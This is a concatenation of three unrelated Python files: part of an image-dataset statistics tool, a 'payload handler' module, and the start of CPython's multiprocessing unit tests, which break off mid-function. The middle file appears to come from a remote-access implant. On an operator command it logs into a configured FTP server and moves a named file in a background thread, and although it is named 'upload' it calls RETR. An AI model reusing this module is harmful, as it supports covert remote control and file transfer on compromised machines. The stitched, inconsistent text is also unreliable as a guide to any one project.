id] = [image[:, :, c].std() for c in range(channel)]
for c in range(channel):
unique, counts = np.unique(image[:, :, c], return_counts=True)
self.im_value_list[id].extend([unique])
self.im_value_num_list[id].extend([counts])
unique, counts = np.unique(label, return_counts=True)
self.label_value_list[id] = unique
self.label_value_num_list[id] = counts
def _get_clipped_mean_std(self, start, end, clip_min_value, clip_max_value):
for id in range(start, end):
full_path_im, full_path_label = self.file_list[id]
image, label = Compose.decode_image(full_path_im, full_path_label)
for c in range(self.channel_num):
np.clip(
image[:, :, c],
clip_min_value[c],
clip_max_value[c],
out=image[:, :, c])
image[:, :, c] -= clip_min_value[c]
image[:, :, c] /= clip_max_value[c] - clip_min_value[c]
self.clipped_im_mean_list[id] = [
image[:, :, c].mean() for c in range(self.channel_num)
]
self.clipped_im_std_list[
id] = [image[:, :, c].std() for c in range(self.channel_num)]
def analysis(self):
self.im_mean_list = [[] for i in range(len(self.file_list))]
self.im_std_list = [[] for i in range(len(self.file_list))]
self.im_value_list = [[] for i in range(len(self.file_list))]
self.im_value_num_list = [[] for i in range(len(self.file_list))]
self.im_height_list = np.zeros(len(self.file_list), dtype='int64')
self.im_width_list = np.zeros(len(self.file_list), dtype='int64')
self.im_channel_list = np.zeros(len(self.file_list), dtype='int64')
self.label_value_list = [[] for i in range(len(self.file_list))]
self.label_value_num_list = [[] for i in range(len(self.file_list))]
num_workers = mp.cpu_count() // 2 if mp.cpu_count() // 2 < 8 else 8
threads = []
one_worker_file = len(self.file_list) // num_workers
for i in range(num_workers):
start = one_worker_file * i
end = one_worker_file * (
i + 1) if i < num_workers - 1 else len(self.file_list)
t = threading.Thread(target=self._get_image_info, args=(start, end))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
unique, counts = np.unique(self.im_channel_list, return_counts=True)
if len(unique) > 1:
raise Exception("There are {} kinds of image channels: {}.".format(
len(unique), unique[:]))
self.channel_num = unique[0]
shape_info = self._get_shape()
self.max_height = shape_info['max_height']
self.max_width = shape_info['max_width']
self.min_height = shape_info['min_height']
self.min_width = shape_info['min_width']
self.label_pixel_info = self._get_label_pixel_info()
self.im_pixel_info = self._get_image_pixel_info()
mode = osp.split(self.file_list_path)[-1].split('.')[0]
import matplotlib.pyplot as plt
for c in range(self.channel_num):
plt.figure()
plt.bar(self.im_pixel_info[c].keys(),
self.im_pixel_info[c].values(),
width=1,
log=True)
plt.xlabel('image pixel value')
plt.ylabel('number')
plt.title('channel={}'.format(c))
plt.savefig(
osp.join(self.data_dir,
'{}_channel{}_distribute.png'.format(mode, c)),
dpi=100)
plt.close()
max_im_value = list()
min_im_value = list()
for c in range(self.channel_num):
max_im_value.append(max(self.im_pixel_info[c].keys()))
min_im_value.append(min(self.im_pixel_info[c].keys()))
self.max_im_value = np.asarray(max_im_value)
self.min_im_value = np.asarray(min_im_value)
im_mean, im_std = self._get_mean_std()
info = {
'channel_num': self.channel_num,
'image_pixel': self.im_pixel_info,
'label_pixel': self.label_pixel_info,
'file_num': len(self.file_list),
'max_height': self.max_height,
'max_width': self.max_width,
'min_height': self.min_height,
'min_width': self.min_width,
'max_image_value': self.max_im_value,
'min_image_value': self.min_im_value
}
saved_pkl_file = osp.join(self.data_dir,
'{}_infomation.pkl'.format(mode))
with open(osp.join(saved_pkl_file), 'wb') as f:
pickle.dump(info, f)
logging.info(
"############## The analysis results are as follows ##############\n"
)
logging.info("{} samples in file {}\n".format(
len(self.file_list), self.file_list_path))
logging.info("Minimal image height: {} Minimal image width: {}.\n".
format(self.min_height, self.min_width))
logging.info("Maximal image height: {} Maximal image width: {}.\n".
format(self.max_height, self.max_width))
logging.info("Image channel is {}.\n".format(self.channel_num))
logging.info(
"Minimal image value: {} Maximal image value: {} (arranged in 0-{} channel order) \n".
format(self.min_im_value, self.max_im_value, self.channel_num))
logging.info(
"Image pixel distribution of each channel is saved with 'distribute.png' in the {}"
.format(self.data_dir))
logging.info(
"Image mean value: {} Image standard deviation: {} (normalized by the (max_im_value - min_im_value), arranged in 0-{} channel order).\n".
format(im_mean, im_std, self.channel_num))
logging.info(
"Label pixel information is shown in a format of (label_id, the number of label_id, the ratio of label_id):"
)
for v, (n, r) in self.label_pixel_info.items():
logging.info("({}, {}, {})".format(v, n, r))
logging.info("Dataset information is saved in {}".format(
saved_pkl_file))
def cal_clipped_mean_std(self, clip_min_value, clip_max_value,
data_info_file):
if not osp.exists(data_info_file):
raise Exception("Dataset information file {} does not exist.".
format(data_info_file))
with open(data_info_file, 'rb') as f:
im_info = pickle.load(f)
channel_num = im_info['channel_num']
min_im_value = im_info['min_image_value']
max_im_value = im_info['max_image_value']
im_pixel_info = im_info['image_pixel']
if len(clip_min_value) != channel_num or len(
clip_max_value) != channel_num:
raise Exception(
"The length of clip_min_value or clip_max_value should be equal to the number of image channel {}."
.format(channle_num))
for c in range(channel_num):
if clip_min_value[c] < min_im_value[c] or clip_min_value[
c] > max_im_value[c]:
raise Exception(
"Clip_min_value of the channel {} is not in [{}, {}]".
format(c, min_im_value[c], max_im_value[c]))
if clip_max_value[c] < min_im_value[c] or clip_max_value[
c] > max_im_value[c]:
raise Exception(
"Clip_max_value of the channel {} is not in [{}, {}]".
format(c, min_im_value[c], self.max_im_value[c]))
self.clipped_im_mean_list = [[] for i in range(len(self.file_list))]
self.clipped_im_std_list = [[] for i in range(len(self.file_list))]
num_workers = mp.cpu_count() // 2 if mp.cpu_count() // 2 < 8 else 8
threads = []
one_worker_file = len(self.file_list) // num_workers
self.channel_num = channel_num
for i in range(num_workers):
start = one_worker_file * i
end = one_worker_file * (
i + 1) if i < num_workers - 1 else len(self.file_list)
t = threading.Thread(
target=self._get_clipped_mean_std,
args=(start, end, clip_min_value, clip_max_value))
threads.append(t)
for t in threads:
t.start()
for t in threads:
t.join()
im_mean = np.asarray(self.clipped_im_mean_list)
im_mean = im_mean.sum(axis=0)
im_mean = im_mean / len(self.file_list)
im_std = np.asarray(self.clipped_im_std_list)
im_std = im_std.sum(axis=0)
im_std = im_std / len(self.file_list)
for c in range(channel_num):
clip_pixel_num = 0
pixel_num = sum(im_pixel_info[c].values())
for v, n in im_pixel_info[c].items():
if v < clip_min_value[c] or v > clip_max_value[c]:
clip_pixel_num += n
logging.info("Channel {}, the ratio of pixels to be clipped = {}".
format(c, clip_pixel_num / pixel_num))
logging.info(
"Image mean value: {} Image standard deviation: {} (normalized by (clip_max_value - clip_min_value), arranged in 0-{} channel order).\n".
format(im_mean, im_std, self.channel_num))
|
upload_payload_handler.py | import ftplib
from payloads.absract_payload_handler import AbstractPayloadHandler
from client import settings
from threading import Thread
class FTPUploadPayloadHandler(AbstractPayloadHandler):
@classmethod
def get_platform(cls):
return "cross_platform"
def ftp_upload(self,file_name):
self.myFTP.retrbinary('RETR %s'%file_name, open('%s'%file_name, 'wb').write)
self.myFTP.quit()
def execute_payload(self, data:bytes) -> str:
'''
server_addr,username,password,file=data[1],data[2],data[3],data[4]
'''
try:
data=data.decode("utf-8")
if not len(data.split())==2:
return "Invalid format: ftp-upload file/dir\n"
file_name=data.split()[1]
self.myFTP = ftplib.FTP()
self.myFTP.connect(settings.FTP_SERVER_ADDR,settings.FTP_SERVER_PORT)
self.myFTP.login(settings.FTP_USER,settings.FTP_PASSWORD)
t=Thread(target=self.ftp_upload,args=(file_name,))
t.daemon=True
t.start()
return 'Upload for {} started successfully\n'.format(file_name)
except Exception as e:
return "Command execution unsuccessful: {}\n".format(str(e))
|
_test_multiprocessing.py | #
# Unit tests for the multiprocessing package
#
import unittest
import queue as pyqueue
import contextlib
import time
import io
import itertools
import sys
import os
import gc
import errno
import signal
import array
import socket
import random
import logging
import struct
import operator
import weakref
import test.support
import test.support.script_helper
from test import support
# Skip tests if _multiprocessing wasn't built.
_multiprocessing = test.support.import_module('_multiprocessing')
# Skip tests if sem_open implementation is broken.
test.support.import_module('multiprocessing.synchronize')
# import threading after _multiprocessing to raise a more relevant error
# message: "No module named _multiprocessing". _multiprocessing is not compiled
# without thread support.
import threading
import multiprocessing.connection
import multiprocessing.dummy
import multiprocessing.heap
import multiprocessing.managers
import multiprocessing.pool
import multiprocessing.queues
from multiprocessing import util
try:
from multiprocessing import reduction
HAS_REDUCTION = reduction.HAVE_SEND_HANDLE
except ImportError:
HAS_REDUCTION = False
try:
from multiprocessing.sharedctypes import Value, copy
HAS_SHAREDCTYPES = True
except ImportError:
HAS_SHAREDCTYPES = False
try:
import msvcrt
except ImportError:
msvcrt = None
#
#
#
# Timeout to wait until a process completes
TIMEOUT = 30.0 # seconds
def latin(s):
return s.encode('latin')
def close_queue(queue):
if isinstance(queue, multiprocessing.queues.Queue):
queue.close()
queue.join_thread()
def join_process(process):
# Since multiprocessing.Process has the same API than threading.Thread
# (join() and is_alive(), the support function can be reused
support.join_thread(process, timeout=TIMEOUT)
#
# Constants
#
LOG_LEVEL = util.SUBWARNING
#LOG_LEVEL = logging.DEBUG
DELTA = 0.1
CHECK_TIMINGS = False # making true makes tests take a lot longer
# and can sometimes cause some non-serious
# failures because some calls block a bit
# longer than expected
if CHECK_TIMINGS:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.82, 0.35, 1.4
else:
TIMEOUT1, TIMEOUT2, TIMEOUT3 = 0.1, 0.1, 0.1
HAVE_GETVALUE = not getattr(_multiprocessing,
'HAVE_BROKEN_SEM_GETVALUE', False)
WIN32 = (sys.platform == "win32")
from multiprocessing.connection import wait
def wait_for_handle(handle, timeout):
if timeout is not None and timeout < 0.0:
timeout = None
return wait([handle], timeout)
try:
MAXFD = os.sysconf("SC_OPEN_MAX")
except:
MAXFD = 256
# To speed up tests when using the forkserver, we can preload these:
PRELOAD = ['__main__', 'test.test_multiprocessing_forkserver']
#
# Some tests require ctypes
#
try:
from ctypes import Structure, c_int, c_double, c_longlong
except ImportError:
Structure = object
c_int = c_double = c_longlong = None
def check_enough_semaphores():
"""Check that the system supports enough semaphores to run the test."""
# minimum number of semaphores available according to POSIX
nsems_min = 256
try:
nsems = os.sysconf("SC_SEM_NSEMS_MAX")
except (AttributeError, ValueError):
# sysconf not available or setting not available
return
if nsems == -1 or nsems >= nsems_min:
return
raise unittest.SkipTest("The OS doesn't support enough semaphores "
"to run the test (required: %d)." % nsems_min)
#
# Creates a wrapper for a function which records the time it takes to finish
#
class TimingWrapper(object):
def __init__(self, func):
self.func = func
self.elapsed = None
def __call__(self, *args, **kwds):
t = time.time()
try:
return self.func(*args, **kwds)
finally:
self.elapsed = time.time() - t
#
# Base class for test cases
#
class BaseTestCase(object):
ALLOWED_TYPES = ('processes', 'manager', 'threads')
def assertTimingAlmostEqual(self, a, b):
if CHECK_TIMINGS:
self.assertAlmostEqual(a, b, 1)
def assertReturnsIfImplemented(self, value, func, *args):
try:
res = func(*args)
except NotImplementedError:
pass
else:
return self.assertEqual(value, res)
# For the sanity of Windows users, rather than crashing or freezing in
# multiple ways.
def __reduce__(self, *args):
raise NotImplementedError("shouldn't try to pickle a test case")
__reduce_ex__ = __reduce__
#
# Return the value of a semaphore
#
def get_value(self):
try:
return self.get_value()
except AttributeError:
try:
return self._Semaphore__value
except AttributeError:
try:
return self._value
except AttributeError:
raise NotImplementedError
#
# Testcases
#
class DummyCallable:
def __call__(self, q, c):
assert isinstance(c, DummyCallable)
q.put(5)
class _TestProcess(BaseTestCase):
ALLOWED_TYPES = ('processes', 'threads')
def test_current(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
current = self.current_process()
authkey = current.authkey
self.assertTrue(current.is_alive())
self.assertTrue(not current.daemon)
self.assertIsInstance(authkey, bytes)
self.assertTrue(len(authkey) > 0)
self.assertEqual(current.ident, os.getpid())
self.assertEqual(current.exitcode, None)
def test_daemon_argument(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
# By default uses the current process's daemon flag.
proc0 = self.Process(target=self._test)
self.assertEqual(proc0.daemon, self.current_process().daemon)
proc1 = self.Process(target=self._test, daemon=True)
self.assertTrue(proc1.daemon)
proc2 = self.Process(target=self._test, daemon=False)
self.assertFalse(proc2.daemon)
@classmethod
def _test(cls, q, *args, **kwds):
current = cls.current_process()
q.put(args)
q.put(kwds)
q.put(current.name)
if cls.TYPE != 'threads':
q.put(bytes(current.authkey))
q.put(current.pid)
def test_process(self):
q = self.Queue(1)
e = self.Event()
args = (q, 1, 2)
kwargs = {'hello':23, 'bye':2.54}
name = 'SomeProcess'
p = self.Process(
target=self._test, args=args, kwargs=kwargs, name=name
)
p.daemon = True
current = self.current_process()
if self.TYPE != 'threads':
self.assertEqual(p.authkey, current.authkey)
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.daemon, True)
self.assertNotIn(p, self.active_children())
self.assertTrue(type(self.active_children()) is list)
self.assertEqual(p.exitcode, None)
p.start()
self.assertEqual(p.exitcode, None)
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(q.get(), args[1:])
self.assertEqual(q.get(), kwargs)
self.assertEqual(q.get(), p.name)
if self.TYPE != 'threads':
self.assertEqual(q.get(), current.authkey)
self.assertEqual(q.get(), p.pid)
p.join()
self.assertEqual(p.exitcode, 0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
close_queue(q)
@classmethod
def _sleep_some(cls):
time.sleep(100)
@classmethod
def _test_sleep(cls, delay):
time.sleep(delay)
def _kill_process(self, meth):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
p = self.Process(target=self._sleep_some)
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
self.assertIn(p, self.active_children())
self.assertEqual(p.exitcode, None)
join = TimingWrapper(p.join)
self.assertEqual(join(0), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
self.assertEqual(join(-1), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), True)
# XXX maybe terminating too soon causes the problems on Gentoo...
time.sleep(1)
meth(p)
if hasattr(signal, 'alarm'):
# On the Gentoo buildbot waitpid() often seems to block forever.
# We use alarm() to interrupt it if it blocks for too long.
def handler(*args):
raise RuntimeError('join took too long: %s' % p)
old_handler = signal.signal(signal.SIGALRM, handler)
try:
signal.alarm(10)
self.assertEqual(join(), None)
finally:
signal.alarm(0)
signal.signal(signal.SIGALRM, old_handler)
else:
self.assertEqual(join(), None)
self.assertTimingAlmostEqual(join.elapsed, 0.0)
self.assertEqual(p.is_alive(), False)
self.assertNotIn(p, self.active_children())
p.join()
return p.exitcode
def test_terminate(self):
exitcode = self._kill_process(multiprocessing.Process.terminate)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGTERM)
def test_kill(self):
exitcode = self._kill_process(multiprocessing.Process.kill)
if os.name != 'nt':
self.assertEqual(exitcode, -signal.SIGKILL)
def test_cpu_count(self):
try:
cpus = multiprocessing.cpu_count()
except NotImplementedError:
cpus = 1
self.assertTrue(type(cpus) is int)
self.assertTrue(cpus >= 1)
def test_active_children(self):
self.assertEqual(type(self.active_children()), list)
p = self.Process(target=time.sleep, args=(DELTA,))
self.assertNotIn(p, self.active_children())
p.daemon = True
p.start()
self.assertIn(p, self.active_children())
p.join()
self.assertNotIn(p, self.active_children())
@classmethod
def _test_recursion(cls, wconn, id):
wconn.send(id)
if len(id) < 2:
for i in range(2):
p = cls.Process(
target=cls._test_recursion, args=(wconn, id+[i])
)
p.start()
p.join()
def test_recursion(self):
rconn, wconn = self.Pipe(duplex=False)
self._test_recursion(wconn, [])
time.sleep(DELTA)
result = []
while rconn.poll():
result.append(rconn.recv())
expected = [
[],
[0],
[0, 0],
[0, 1],
[1],
[1, 0],
[1, 1]
]
self.assertEqual(result, expected)
@classmethod
def _test_sentinel(cls, event):
event.wait(10.0)
def test_sentinel(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
event = self.Event()
p = self.Process(target=self._test_sentinel, args=(event,))
with self.assertRaises(ValueError):
p.sentinel
p.start()
self.addCleanup(p.join)
sentinel = p.sentinel
self.assertIsInstance(sentinel, int)
self.assertFalse(wait_for_handle(sentinel, timeout=0.0))
event.set()
p.join()
self.assertTrue(wait_for_handle(sentinel, timeout=1))
@classmethod
def _test_close(cls, rc=0, q=None):
if q is not None:
q.get()
sys.exit(rc)
def test_close(self):
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
q = self.Queue()
p = self.Process(target=self._test_close, kwargs={'q': q})
p.daemon = True
p.start()
self.assertEqual(p.is_alive(), True)
# Child is still alive, cannot close
with self.assertRaises(ValueError):
p.close()
q.put(None)
p.join()
self.assertEqual(p.is_alive(), False)
self.assertEqual(p.exitcode, 0)
p.close()
with self.assertRaises(ValueError):
p.is_alive()
with self.assertRaises(ValueError):
p.join()
with self.assertRaises(ValueError):
p.terminate()
p.close()
wr = weakref.ref(p)
del p
gc.collect()
self.assertIs(wr(), None)
close_queue(q)
def test_many_processes(self):
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
N = 5 if sm == 'spawn' else 100
# Try to overwhelm the forkserver loop with events
procs = [self.Process(target=self._test_sleep, args=(0.01,))
for i in range(N)]
for p in procs:
p.start()
for p in procs:
join_process(p)
for p in procs:
self.assertEqual(p.exitcode, 0)
procs = [self.Process(target=self._sleep_some)
for i in range(N)]
for p in procs:
p.start()
time.sleep(0.001) # let the children start...
for p in procs:
p.terminate()
for p in procs:
join_process(p)
if os.name != 'nt':
exitcodes = [-signal.SIGTERM]
if sys.platform == 'darwin':
# bpo-31510: On macOS, killing a freshly started process with
# SIGTERM sometimes kills the process with SIGKILL.
exitcodes.append(-signal.SIGKILL)
for p in procs:
self.assertIn(p.exitcode, exitcodes)
def test_lose_target_ref(self):
c = DummyCallable()
wr = weakref.ref(c)
q = self.Queue()
p = self.Process(target=c, args=(q, c))
del c
p.start()
p.join()
self.assertIs(wr(), None)
self.assertEqual(q.get(), 5)
close_queue(q)
@classmethod
def _test_child_fd_inflation(self, evt, q):
q.put(test.support.fd_count())
evt.wait()
def test_child_fd_inflation(self):
# Number of fds in child processes should not grow with the
# number of running children.
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm == 'fork':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
N = 5
evt = self.Event()
q = self.Queue()
procs = [self.Process(target=self._test_child_fd_inflation, args=(evt, q))
for i in range(N)]
for p in procs:
p.start()
try:
fd_counts = [q.get() for i in range(N)]
self.assertEqual(len(set(fd_counts)), 1, fd_counts)
finally:
evt.set()
for p in procs:
p.join()
close_queue(q)
@classmethod
def _test_wait_for_threads(self, evt):
def func1():
time.sleep(0.5)
evt.set()
def func2():
time.sleep(20)
evt.clear()
threading.Thread(target=func1).start()
threading.Thread(target=func2, daemon=True).start()
def test_wait_for_threads(self):
# A child process should wait for non-daemonic threads to end
# before exiting
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
evt = self.Event()
proc = self.Process(target=self._test_wait_for_threads, args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
@classmethod
def _test_error_on_stdio_flush(self, evt, break_std_streams={}):
for stream_name, action in break_std_streams.items():
if action == 'close':
stream = io.StringIO()
stream.close()
else:
assert action == 'remove'
stream = None
setattr(sys, stream_name, None)
evt.set()
def test_error_on_stdio_flush_1(self):
# Check that Process works with broken standard streams
streams = [io.StringIO(), None]
streams[0].close()
for stream_name in ('stdout', 'stderr'):
for stream in streams:
old_stream = getattr(sys, stream_name)
setattr(sys, stream_name, stream)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt,))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
def test_error_on_stdio_flush_2(self):
# Same as test_error_on_stdio_flush_1(), but standard streams are
# broken by the child process
for stream_name in ('stdout', 'stderr'):
for action in ('close', 'remove'):
old_stream = getattr(sys, stream_name)
try:
evt = self.Event()
proc = self.Process(target=self._test_error_on_stdio_flush,
args=(evt, {stream_name: action}))
proc.start()
proc.join()
self.assertTrue(evt.is_set())
self.assertEqual(proc.exitcode, 0)
finally:
setattr(sys, stream_name, old_stream)
@classmethod
def _sleep_and_set_event(self, evt, delay=0.0):
time.sleep(delay)
evt.set()
def check_forkserver_death(self, signum):
# bpo-31308: if the forkserver process has died, we should still
# be able to create and run new Process instances (the forkserver
# is implicitly restarted).
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
sm = multiprocessing.get_start_method()
if sm != 'forkserver':
# The fork method by design inherits all fds from the parent,
# trying to go against it is a lost battle
self.skipTest('test not appropriate for {}'.format(sm))
from multiprocessing.forkserver import _forkserver
_forkserver.ensure_running()
# First process sleeps 500 ms
delay = 0.5
evt = self.Event()
proc = self.Process(target=self._sleep_and_set_event, args=(evt, delay))
proc.start()
pid = _forkserver._forkserver_pid
os.kill(pid, signum)
# give time to the fork server to die and time to proc to complete
time.sleep(delay * 2.0)
evt2 = self.Event()
proc2 = self.Process(target=self._sleep_and_set_event, args=(evt2,))
proc2.start()
proc2.join()
self.assertTrue(evt2.is_set())
self.assertEqual(proc2.exitcode, 0)
proc.join()
self.assertTrue(evt.is_set())
self.assertIn(proc.exitcode, (0, 255))
def test_forkserver_sigint(self):
# Catchable signal
self.check_forkserver_death(signal.SIGINT)
def test_forkserver_sigkill(self):
# Uncatchable signal
if os.name != 'nt':
self.check_forkserver_death(signal.SIGKILL)
#
#
#
class _UpperCaser(multiprocessing.Process):
def __init__(self):
multiprocessing.Process.__init__(self)
self.child_conn, self.parent_conn = multiprocessing.Pipe()
def run(self):
self.parent_conn.close()
for s in iter(self.child_conn.recv, None):
self.child_conn.send(s.upper())
self.child_conn.close()
def submit(self, s):
assert type(s) is str
self.parent_conn.send(s)
return self.parent_conn.recv()
def stop(self):
self.parent_conn.send(None)
self.parent_conn.close()
self.child_conn.close()
class _TestSubclassingProcess(BaseTestCase):
ALLOWED_TYPES = ('processes',)
def test_subclassing(self):
uppercaser = _UpperCaser()
uppercaser.daemon = True
uppercaser.start()
self.assertEqual(uppercaser.submit('hello'), 'HELLO')
self.assertEqual(uppercaser.submit('world'), 'WORLD')
uppercaser.stop()
uppercaser.join()
def test_stderr_flush(self):
# sys.stderr is flushed at process shutdown (issue #13812)
if self.TYPE == "threads":
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
proc = self.Process(target=self._test_stderr_flush, args=(testfn,))
proc.start()
proc.join()
with open(testfn, 'r') as f:
err = f.read()
# The whole traceback was printed
self.assertIn("ZeroDivisionError", err)
self.assertIn("test_multiprocessing.py", err)
self.assertIn("1/0 # MARKER", err)
@classmethod
def _test_stderr_flush(cls, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
1/0 # MARKER
@classmethod
def _test_sys_exit(cls, reason, testfn):
fd = os.open(testfn, os.O_WRONLY | os.O_CREAT | os.O_EXCL)
sys.stderr = open(fd, 'w', closefd=False)
sys.exit(reason)
def test_sys_exit(self):
# See Issue 13854
if self.TYPE == 'threads':
self.skipTest('test not appropriate for {}'.format(self.TYPE))
testfn = test.support.TESTFN
self.addCleanup(test.support.unlink, testfn)
for reason in (
[1, 2, 3],
'ignore this',
):
p = self.Process(target=self._test_sys_exit, args=(reason, testfn))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, 1)
with open(testfn, 'r') as f:
content = f.read()
self.assertEqual(content.rstrip(), str(reason))
os.unlink(testfn)
for reason in (True, False, 8):
p = self.Process(target=sys.exit, args=(reason,))
p.daemon = True
p.start()
join_process(p)
self.assertEqual(p.exitcode, reason)
#
#
#
def queue_empty(q):
if hasattr(q, 'empty'):
return q.empty()
else:
return q.qsize() == 0
def queue_full(q, maxsize):
if hasattr(q, 'full'):
return q.full()
else:
return q.qsize() == maxsize
class _TestQueue(BaseTestCase):
@classmethod
def _test_put(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
for i in range(6):
queue.get()
parent_can_continue.set()
def test_put(self):
MAXSIZE = 6
queue = self.Queue(maxsize=MAXSIZE)
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_put,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
queue.put(1)
queue.put(2, True)
queue.put(3, True, None)
queue.put(4, False)
queue.put(5, False, None)
queue.put_nowait(6)
# the values may be in buffer but not yet in pipe so sleep a bit
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
self.assertEqual(queue_full(queue, MAXSIZE), True)
put = TimingWrapper(queue.put)
put_nowait = TimingWrapper(queue.put_nowait)
self.assertRaises(pyqueue.Full, put, 7, False)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, False, None)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put_nowait, 7)
self.assertTimingAlmostEqual(put_nowait.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, TIMEOUT1)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Full, put, 7, False, TIMEOUT2)
self.assertTimingAlmostEqual(put.elapsed, 0)
self.assertRaises(pyqueue.Full, put, 7, True, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(put.elapsed, TIMEOUT3)
child_can_start.set()
parent_can_continue.wait()
self.assertEqual(queue_empty(queue), True)
self.assertEqual(queue_full(queue, MAXSIZE), False)
proc.join()
close_queue(queue)
@classmethod
def _test_get(cls, queue, child_can_start, parent_can_continue):
child_can_start.wait()
#queue.put(1)
queue.put(2)
queue.put(3)
queue.put(4)
queue.put(5)
parent_can_continue.set()
def test_get(self):
queue = self.Queue()
child_can_start = self.Event()
parent_can_continue = self.Event()
proc = self.Process(
target=self._test_get,
args=(queue, child_can_start, parent_can_continue)
)
proc.daemon = True
proc.start()
self.assertEqual(queue_empty(queue), True)
child_can_start.set()
parent_can_continue.wait()
time.sleep(DELTA)
self.assertEqual(queue_empty(queue), False)
# Hangs unexpectedly, remove for now
#self.assertEqual(queue.get(), 1)
self.assertEqual(queue.get(True, None), 2)
self.assertEqual(queue.get(True), 3)
self.assertEqual(queue.get(timeout=1), 4)
self.assertEqual(queue.get_nowait(), 5)
self.assertEqual(queue_empty(queue), True)
get = TimingWrapper(queue.get)
get_nowait = TimingWrapper(queue.get_nowait)
self.assertRaises(pyqueue.Empty, get, False)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, False, None)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get_nowait)
self.assertTimingAlmostEqual(get_nowait.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, True, TIMEOUT1)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT1)
self.assertRaises(pyqueue.Empty, get, False, TIMEOUT2)
self.assertTimingAlmostEqual(get.elapsed, 0)
self.assertRaises(pyqueue.Empty, get, timeout=TIMEOUT3)
self.assertTimingAlmostEqual(get.elapsed, TIMEOUT3)
proc.join()
close_queue(queue)
@classmethod
def _test_fork(cls, queue):
for i in range(10, 20):
queue.put(i)
# note that at this point the items may only be buffered, so the
# process cannot shutdown until the feeder thread has finished
# pushing items onto the pipe.
def test_fork(self):
# Old versions of Queue would fail to create a new feeder
# thread for a forked process if the original process had its
# own feeder thread. This test checks that this no longer
# happens.
queue = self.Queue()
# put items on queue so that main process starts a feeder thread
for i in range(10):
queue.put(i)
# wait to make sure thread starts before we fork a new process
time.sleep(DELTA)
# fork process
p = self.Process(target=self._test_fork, args=(queue,))
p.daemon = True
p.start()
# check that all expected items are in the queue
for i in range(20):
self.assertEqual(queue.get(), i)
self.assertRaises(pyqueue.Empty, queue.get, False)
p.join()
close_queue(queue)
def test_qsize(self):
q = self.Queue()
try:
self.assertEqual(q.qsize(), 0)
except NotImplementedError:
self.skipTest('qsize method not implemented')
q.put(1)
self.assertEqual(q.qsize(), 1)
q.put(5)
self.assertEqual(q.qsize(), 2)
q.get()
self.assertEqual(q.qsize(), 1)
q.get()
self.assertEqual(q.qsize(), 0)
close_queue(q)
@classmethod
def _test_task_done(cls, q):
for obj in iter(q.get, None):
time.sleep(DELTA)
q.task_done()
def test_task_done(self):
queue = self.JoinableQueue()
workers = [self.Process(target=self._test_task_done, args=(queue,))
for i in range(4)]
for p in workers:
p.daemon = True
p.start()
for i in range(10):
queue.put(i)
queue.join()
for p in workers:
queue.put(None)
for p in workers:
p.join()
close_queue(queue)
def test_no_import_lock_contention(self):
with test.support.temp_cwd():
module_name = 'imported_by_an_imported_module'
with open(module_name + '.py', 'w') as f:
f.write("""if 1:
import multiprocessing
q = multiprocessing.Queue()
q.put('knock knock')
q.get(timeout=3)
q.close()
del q
""")
with test.support.DirsOnSysPath(os.getcwd()):
try:
__import__(module_name)
except pyqueue.Empty:
self.fail("Probable regression on import lock contention;"
" see Issue #22853")
def test_timeout(self):
q = multiprocessing.Queue()
start = time.time()
self.assertRaises(pyqueue.Empty, q.get, True, 0.200)
delta = time.time() - start
# Tolerate a delta of 50 ms because of the bad clock resolution on
# Windows (usually 15.6 ms)
self.assertGreaterEqual(delta, 0.150)
close_queue(q)
def test_queue_feeder_donot_stop_onexc(self):
